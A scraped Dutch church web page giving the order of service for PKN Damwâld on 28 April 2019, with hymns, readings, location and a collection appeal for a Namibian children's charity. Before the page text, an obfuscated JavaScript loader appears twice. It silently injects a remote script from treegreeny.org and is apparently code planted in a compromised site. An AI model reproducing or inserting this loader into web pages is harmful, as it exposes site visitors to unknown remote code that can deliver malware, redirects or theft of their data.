;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 28 april 2019 9:30 uur - PKN Damwâld
zondag 28 april 2019
09:30 uur

Kerkdienst zondag 28 april 2019 9:30 uur

Informatie

Voorganger:Mw. R. van der Wal-Akker, Morra
Organist:Nienke van der Heide-Visser
Liturgie
Lied voor de dienst Gezang 434 : 1, 2 en 5
Welkom en Memoriam
We zingen Elb 371 : 1, 3 en 4
- Stil gebed en Woord van Verwachting
We zingen: Gezang 463 : 1, 2 en 4
Samenvatting van de wet .
We zingen: Psalm 25 : 1
Gebed
We zingen: Psalm 25 : 2
We lezen: 1 Korintiërs 15 , 1 – 22
We zingen: Elb 346
Verkondiging .
We zingen: Gezang 109 : 1, 3, 4 en 5
Dankgebed en voorbede
Collecte
We zingen: Elb 140
Zegen
We zingen: Gezang 411 : 1 en 6
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: St. Beautiful Kidz Namibia

Stichting Beautiful Kidz Namibia
Beautiful Kidz Namibia is een Christelijke, Interkerkelijke organisatie. In een eigen dagverzorgingscentrum in de sloppenwijk "Katutura"van de hoofdstad Windhoek wordt sinds 2003 steun geboden aan kinderen in nood. In 2014 is de organisatie uitgebreid met het dagopvangcentrum in Ovitoto. Het gaat om steun aan kwetsbare kinderen die veelal het slachtoffer zijn geworden van de HIV/AIDS epidemie. Vader en/of moeder zijn aan de gevolgen van AIDS overleden en in veel gevallen zijn de kinderen zelf ook seropositief. Het met nauwelijks twee miljoen inwoners dun bevolkte land Namibia telt 200.000 weeskinderen! Er is een groot tekort aan opvang voor deze kinderen. Beautiful Kidz gaat de uitdaging aan!

Tweede collecte: Kerk
Uitganscollecte: Kerk